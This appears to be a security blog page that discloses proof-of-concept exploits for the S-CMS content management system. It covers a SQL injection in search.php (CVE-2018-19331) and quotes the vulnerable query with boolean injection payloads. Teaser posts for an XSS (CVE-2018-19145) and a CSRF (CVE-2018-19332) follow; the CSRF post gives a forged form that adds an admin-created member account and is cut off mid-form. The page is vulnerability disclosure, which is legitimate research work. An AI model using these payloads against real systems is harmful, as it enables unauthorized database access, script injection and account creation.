Skip to main content

The POC of S-CMS(sql-injection)-CVE-2018-19331

Download page:
https://shanlingtest.oss-cn-shenzhen.aliyuncs.com/file/2.mall.php.zip

location: S-CMS/search.php line 155

Vulnerable code:  $sql="select * from SL_text where (T_title like '%".$keyword."%' or T_content like '%".$keyword."%' ) order by T_id desc";

Exp:
%' AND 1=1 AND '%'='




%' AND 1=2 AND '%'='



Attacker can add sql statement in the between of both "and" to query the database.


Comments

Popular posts from this blog

The POC of S-CMS(Xss) -CVE-2018-19145

Download page:
https://shanlingtest.oss-cn-shenzhen.aliyuncs.com/file/2.mall.php.zip

location: S-CMS/search.php   line144

Vulnerable code:  <input type="text" name="keyword" class="form-control" placeholder="<?php echo lang("输入关键词/l/Input your Keywords")?>" value="<?php echo $keyword?>">

Exp: "><script>(1)</script>






The POC of S-CMS(CSRF)-CVE-2018-19332

Download page:
https://shanlingtest.oss-cn-shenzhen.aliyuncs.com/file/2.mall.php.zip


CSRF Exp:
<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html" charset="utf-8" />
</head>
<body>
<center><h1>fake request</center>
<div>
    <form action="http://127.0.0.1/S-CMS/admin/ajax.php?type=member&action=add&lang=0" name="form" method="post" role="form">
    <input type="hidden" name="M_login" value="hacker">
    <input type="hidden" name="M_pwd" value="hacker">
    <input type="hidden" name="M_money" value="10000">
    <input type="hidden" name="M_fen" value="0">
    <input type="hidden" name="M_name" value="1">
    <input type="hidden…